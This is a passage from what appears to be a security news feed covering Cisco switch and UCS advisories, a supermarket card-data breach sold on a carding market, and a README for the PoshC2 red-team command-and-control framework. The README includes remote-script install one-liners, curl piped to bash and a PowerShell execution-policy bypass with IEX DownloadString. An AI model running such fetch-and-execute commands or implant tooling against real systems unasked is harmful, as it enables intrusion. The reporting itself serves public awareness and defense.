Another flaw is an authentication bypass security flaw tracked as CVE-2019-1912 that resides in the web management interface of Cisco Small Business 220 Series Smart Switches. The flaw could be exploited by an attacker to modify the configuration of an affected device or to inject a reverse shell.

“A vulnerability in the web management interface of Cisco Small Business 220 Series Smart Switches could allow an unauthenticated, remote attacker to upload arbitrary files.” reads the security advisory.

“The vulnerability is due to incomplete authorization checks in the web management interface. An attacker could exploit this vulnerability by sending a malicious request to certain parts of the web management interface. Depending on the configuration of the affected switch, the malicious request must be sent via HTTP or HTTPS. A successful exploit could allow the attacker to modify the configuration of an affected device or to inject a reverse shell.”

The third flaw is a command injection vulnerability tracked as CVE-2019-1914 that could be exploited by an authenticated, remote attackers launch a command injection attack.

The good news is that Cisco is not aware of attacks exploiting the above issues.

“The Cisco Product Security Incident Response Team (PSIRT) is aware of the existence of public exploit code. Cisco PSIRT is not aware of malicious use of the vulnerability that is described in this advisory.” states Cisco.

Cisco also released security patches to address 17 critical and high-severity vulnerabilities affecting some Cisco Unified Computing products (UCS) and Integrated Management Controller (IMC).

Also for these flaws, Cisco confirmed it is not aware of attacks in the wild that have exploited them.

Pierluigi Paganini

(SecurityAffairs – Cisco Small Business, hacking)

The post Cisco warns of the availability of public exploit code for critical flaws in Cisco Small Business switches appeared first on Security Affairs.

Breach at Hy-Vee Supermarket Chain Tied to Sale of 5M+ Stolen Credit, Debit Cards

On Tuesday of this week, one of the more popular underground stores peddling credit and debit card data stolen from hacked merchants announced a blockbuster new sale: More than 5.3 million new accounts belonging to cardholders from 35 U.S. states. Multiple sources now tell KrebsOnSecurity that the card data came from compromised gas pumps, coffee shops and restaurants operated by Hy-Vee, an Iowa-based company that operates a chain of more than 245 supermarkets throughout the Midwestern United States.

Hy-Vee, based in Des Moines, announced on Aug. 14 it was investigating a data breach involving payment processing systems that handle transactions at some Hy-Vee fuel pumps, drive-thru coffee shops and restaurants.

The restaurants affected include Hy-Vee Market Grilles, Market Grille Expresses and Wahlburgers locations that the company owns and operates. Hy-Vee said it was too early to tell when the breach initially began or for how long intruders were inside their payment systems.

But typically, such breaches occur when cybercriminals manage to remotely install malicious software on a retailer’s card-processing systems. This type of point-of-sale malware is capable of copying data stored on a credit or debit card’s magnetic stripe when those cards are swiped at compromised payment terminals. This data can then be used to create counterfeit copies of the cards.

Hy-Vee said it believes the breach does not affect payment card terminals used at its grocery store checkout lanes, pharmacies or convenience stores, as these systems rely on a security technology designed to defeat card-skimming malware.

“These locations have different point-of-sale systems than those located at our grocery stores, drugstores and inside our convenience stores, which utilize point-to-point encryption technology for processing payment card transactions,” Hy-Vee said. “This encryption technology protects card data by making it unreadable. Based on our preliminary investigation, we believe payment card transactions that were swiped or inserted on these systems, which are utilized at our front-end checkout lanes, pharmacies, customer service counters, wine & spirits locations, floral departments, clinics and all other food service areas, as well as transactions processed through Aisles Online, are not involved.”

According to two sources who asked not to be identified for this story — including one at a major U.S. financial institution — the card data stolen from Hy-Vee is now being sold under the code name “Solar Energy,” at the infamous Joker’s Stash carding bazaar.

An ad at the Joker’s Stash carding site for “Solar Energy,” a batch of more than 5 million credit and debit cards sources say was stolen from customers of supermarket chain Hy-Vee.

Hy-Vee said the company’s investigation is continuing.

“We are aware of reports from payment processors and the card networks of payment data being offered for sale and are working with the payment card networks so that they can identify the cards and work with issuing banks to initiate heightened monitoring on accounts,” Hy-Vee spokesperson Tina Pothoff said.

The card account records sold by Joker’s Stash, known as “dumps,” apparently stolen from Hy-Vee are being sold for prices ranging from $17 to $35 apiece. Buyers typically receive a text file that includes all of their dumps. Those individual dumps records — when encoded onto a new magnetic stripe on virtually anything the size of a credit card — can be used to purchase stolen merchandise in big box stores.

As noted in previous stories here, the organized cyberthieves involved in stealing card data from main street merchants have gradually moved down the food chain from big box retailers like Target and Home Depot to smaller but far more plentiful and probably less secure merchants (either by choice or because the larger stores became a harder target).

It’s really not worth spending time worrying about where your card number may have been breached, since it’s almost always impossible to say for sure and because it’s common for the same card to be breached at multiple establishments during the same time period.

Just remember that while consumers are not liable for fraudulent charges, it may still fall to you the consumer to spot and report any suspicious charges. So keep a close eye on your statements, and consider signing up for text message notifications of new charges if your card issuer offers this service. Most of these services also can be set to alert you if you’re about to miss an upcoming payment, so they can also be handy for avoiding late fees and other costly charges.

PoshC2 - C2 Server and Implants

By: Zion3R

PoshC2 is a proxy aware C2 framework that utilises Powershell and/or equivalent (System.Management.Automation.dll) to aid penetration testers with red teaming, post-exploitation and lateral movement. Powershell was chosen as the base implant language as it provides all of the functionality and rich features without needing to introduce multiple third party libraries to the framework.
In addition to the Powershell implant, PoshC2 also has a basic dropper written purely in Python that can be used for command and control over Unix based systems such as Mac OS or Ubuntu.
The server-side component is written in Python for cross-platform portability and speed, a Powershell server component still exists and can be installed using the 'Windows Install' as shown below but will not be maintained with future updates and releases.

Linux Install Python3
Automatic install for Python3 using curl & bash
curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2_Python/master/Install.sh | bash
Manual install Python3
wget https://raw.githubusercontent.com/nettitude/PoshC2_Python/master/Install.sh
chmod +x ./Install.sh
./Install.sh

Linux Install Python2 - stable but unmaintained
Automatic install for Python2 using curl & bash
curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2_Python/python2/Install.sh | bash
Manual install Python2
wget https://raw.githubusercontent.com/nettitude/PoshC2_Python/python2/Install.sh
chmod +x ./Install.sh
./Install.sh

Windows Install
Install Git and Python (and ensure Python is in the PATH), then run:
powershell -exec bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/nettitude/PoshC2_Python/master/Install.ps1')"

Using older versions
You can use an older version of PoshC2 by referencing the appropriate tag. You can list the tags for the repository by issuing:
git tag --list
or viewing them online.
Then you can use the install one-liner but replace the branch name with the tag:
curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2_Python/<tag name>/Install.sh | bash
For example:
curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2_Python/v4.8/Install.sh | bash

Offline
If you have a local clone of PoshC2 you can change the version that is in use by just checking out the version you want to use:
git reset --hard <tag name>
For example:
git reset --hard v4.8
However note that this will overwrite any local changes to files, such as Config.py and you may have to re-run the install script for that version or re-setup the environment appropriately.

Running PoshC2
  1. Edit the config file by running posh-config to open it in $EDITOR. If this variable is not set then it defaults to vim, or you can use --nano to open it in nano.
  2. Run the server using posh-server or python3 -u C2Server.py | tee -a /var/log/poshc2_server.log
  3. Others can view the log using posh-log or tail -n 5000 -f /var/log/poshc2_server.log
  4. Interact with the implants using the handler, run by using posh or python3 ImplantHandler.py

Installing as a service
Installing as a service provides multiple benefits such as being able to log to service logs, viewing with journalctl and automatically starting on reboot.
  1. Add the file in systemd (this is automatically done via the install script)
cp poshc2.service /lib/systemd/system/poshc2.service
  1. Start the service
posh-service
  1. View the log:
posh-log
  1. Or alternatively us journalctl (but note this can be rate limited)
journalctl -n 20000 -u poshc2.service -f --output cat
Note that re-running posh-service will restart the posh-service. Running posh-service will automatically start to display the log, but Ctrl-C will not stop the service only quit the log in this case posh-log can be used to re-view the log at any point. posh-stop-service can be used to stop the service.

Issues / FAQs
If you are experiencing any issues during the installation or use of PoshC2 please check the known issues below and the open issues tracking page within GitHub. If this page doesn't have what you're looking for please open a new issue and we will try to resolve the issue asap.
If you are looking for tips and tricks on PoshC2 usage and optimisation, you are welcome to join the slack channel below.

License / Terms of Use
This software should only be used for authorised testing activity and not for malicious use.
By downloading this software you are accepting the terms of use and the licensing agreement.

Documentation
We maintain PoshC2 documentation over at https://poshc2.readthedocs.io/en/latest/
Find us on #Slack - poshc2.slack.com (to request an invite send an email to labs@nettitude.com)

Known issues

Error encrypting value: object type
If you get this error after installing PoshC2 it is due to dependency clashes in the pip packages on the system.
Try creating a virtualenv in python and re-install the requirements so that the exact versions specified are in use for PoshC2. Make sure you deactivate when you've finished in this virtualenv.
For example:
pip install virtualenv
virtualenv /opt/PoshC2_Python/
source /opt/PoshC2_Python/bin/activate
pip install -r requirements.txt
python C2Server.py
Note anytime you run PoshC2 you have to reactivate the virtual environment and run it in that.
The use of a virtual environment is abstracted if you use the posh- scripts on *nix.


Cisco addressed several vulnerabilities in UCS products

Cisco released security patches to address 17 critical and high-severity vulnerabilities affecting some Cisco Unified Computing products (UCS and IMC).

Cisco has released security fixes to address 17 critical and high-severity vulnerabilities affecting some Cisco Unified Computing products.

Most of the flaws affect the Integrated Management Controller (IMC) that is a baseboard management controller that provides embedded server management for Cisco Unified Computing System (UCS) servers.

The critical flaws impacting the CISCO UCS addressed by the tech giant are CVE-2019-1937CVE-2019-1974CVE-2019-1935 and CVE-2019-1938. These flaws could be exploited by remote, unauthenticated attackers to gain elevated privileges, including administrator permissions, on the targeted system.

A remote attacker could exploit the vulnerabilities by sending specially crafted requests and abusing default credentials.

“A vulnerability in the web-based management interface of Cisco Integrated Management Controller (IMC) Supervisor, Cisco UCS Director, and Cisco UCS Director Express for Big Data could allow an unauthenticated, remote attacker to acquire a valid session token with administrator privileges, bypassing user authentication.” reads the advisory for the CVE-2019-1937 flaw.

“The vulnerability is due to insufficient request header validation during the authentication process. An attacker could exploit this vulnerability by sending a series of malicious requests to an affected device. An exploit could allow the attacker to use the acquired session token to gain full administrator access to the affected device.”

Cisco addressed also multiple high-severity vulnerabilities that could be exploited to trigger a denial-of-service (DoS) condition, to execute arbitrary commands with root privileges, obtain sensitive configuration data, elevate privileges, and modify the system configuration,

Some of the flaws addressed by Cisco have been reported by the security researcher Pedro Ribeiro, aka “bashis,” another expert whose identity was not revealed, and some other external researchers.

The good news is that Cisco is not aware of attacks in the wild that have exploited the flaws in UCS and IMC products.

Pierluigi Paganini

(SecurityAffairs – Cisco Unified Computing Products, hacking)

The post Cisco addressed several vulnerabilities in UCS products appeared first on Security Affairs.

AWS Security Monitoring Checklist [Updated 2019]

Since every organization is moving towards cloud, the roles and responsibilities of in-house security teams have increased a lot. Due to lack of complete ownership, security teams do not have visibility and control of the underlying/leased infrastructure. In this article, we will examine the security checklist for AWS which every security team should keep an […]

The post AWS Security Monitoring Checklist [Updated 2019] appeared first on Infosec Resources.


AWS Security Monitoring Checklist [Updated 2019] was first posted on August 23, 2019 at 8:22 am.
©2017 "InfoSec Resources". Use of this feed is for personal non-commercial use only. If you are not reading this article in your feed reader, then the site is guilty of copyright infringement. Please contact me at darren.dalasta@infosecinstitute.com
❌